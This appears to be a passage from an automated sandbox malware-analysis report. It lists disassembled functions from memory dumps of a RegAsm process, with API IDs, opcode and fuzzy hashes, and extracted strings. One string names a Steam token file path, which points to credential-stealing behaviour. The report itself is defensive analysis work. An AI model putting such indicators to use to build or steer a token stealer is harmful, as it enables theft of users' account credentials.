                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog$lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                                                                                                                                • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                                                                • API String ID: 40794102-3507145866
                                                                                                                                                                                                • Opcode ID: 18fec3fed02bf81fddc6927c01834681bc391b2c2ba2821c77b1dbe4a284519a
                                                                                                                                                                                                • Instruction ID: c155f4848beaaa2a24137906c651ab11ee3d20935933931ec9537bcc0d77ae6f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 18fec3fed02bf81fddc6927c01834681bc391b2c2ba2821c77b1dbe4a284519a
                                                                                                                                                                                                • Instruction Fuzzy Hash: C12158B1C00248EACB05FBE6C856BDDBB78AF18308F10856EE442721D2DB781758CA76
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040CD2E
                                                                                                                                                                                                  • Part of subcall function 0041D590: std::exception::exception.LIBCMT ref: 0041D5A5
                                                                                                                                                                                                  • Part of subcall function 0041D590: __CxxThrowException@8.LIBCMT ref: 0041D5BA
                                                                                                                                                                                                  • Part of subcall function 0041D590: std::exception::exception.LIBCMT ref: 0041D5CB
                                                                                                                                                                                                • memmove.MSVCRT ref: 0040CD67
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • invalid string position, xrefs: 0040CD29
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                                                                                                                                                                • String ID: invalid string position
                                                                                                                                                                                                • API String ID: 1659287814-1799206989
                                                                                                                                                                                                • Opcode ID: 23a08f5dca3bc3f5120ab8ab9d33a5b0fd03648de46993dc837c84427842964f
                                                                                                                                                                                                • Instruction ID: 4dfe33b9afb320470da450dddba9e73fd49afeb28b32f74b1e74b96e38d81fb2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 23a08f5dca3bc3f5120ab8ab9d33a5b0fd03648de46993dc837c84427842964f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6301B531300210DBD7249F6CDDC092ABBB6EF867147204E3ED4859B785DA78EC4A97E8
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • invalid, xrefs: 1B4C721B
                                                                                                                                                                                                • API call with %s database connection pointer, xrefs: 1B4C7220
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: API call with %s database connection pointer$invalid
                                                                                                                                                                                                • API String ID: 0-3574585026
                                                                                                                                                                                                • Opcode ID: 56faea79b3bfcabb95701decb1e0a35c16d702aef310a18da6c4d3f2fc1b16ec
                                                                                                                                                                                                • Instruction ID: c6d8a95432aacfac1f33a00d8a54fe96b9925f9f9fa7258919dcb5d5c5e97424
                                                                                                                                                                                                • Opcode Fuzzy Hash: 56faea79b3bfcabb95701decb1e0a35c16d702aef310a18da6c4d3f2fc1b16ec
                                                                                                                                                                                                • Instruction Fuzzy Hash: 80F0F675F046104BDB208E28FC15BE777DE5F50B21F008A59F6E692390C220E854C293
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$misuse
                                                                                                                                                                                                • API String ID: 0-2530468415
                                                                                                                                                                                                • Opcode ID: a1330bf42c9682131d1c38086339ec4e2237d3f70da11abe9af5d5c9aee75e35
                                                                                                                                                                                                • Instruction ID: f11db9342b5777efd42d460a41fa81d6e9b2da521cf191e35a82b821ef974bec
                                                                                                                                                                                                • Opcode Fuzzy Hash: a1330bf42c9682131d1c38086339ec4e2237d3f70da11abe9af5d5c9aee75e35
                                                                                                                                                                                                • Instruction Fuzzy Hash: D7C01262640348E6CB049B94ED43DD92F309FA8B51B5182A5A62529086D21091584351
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%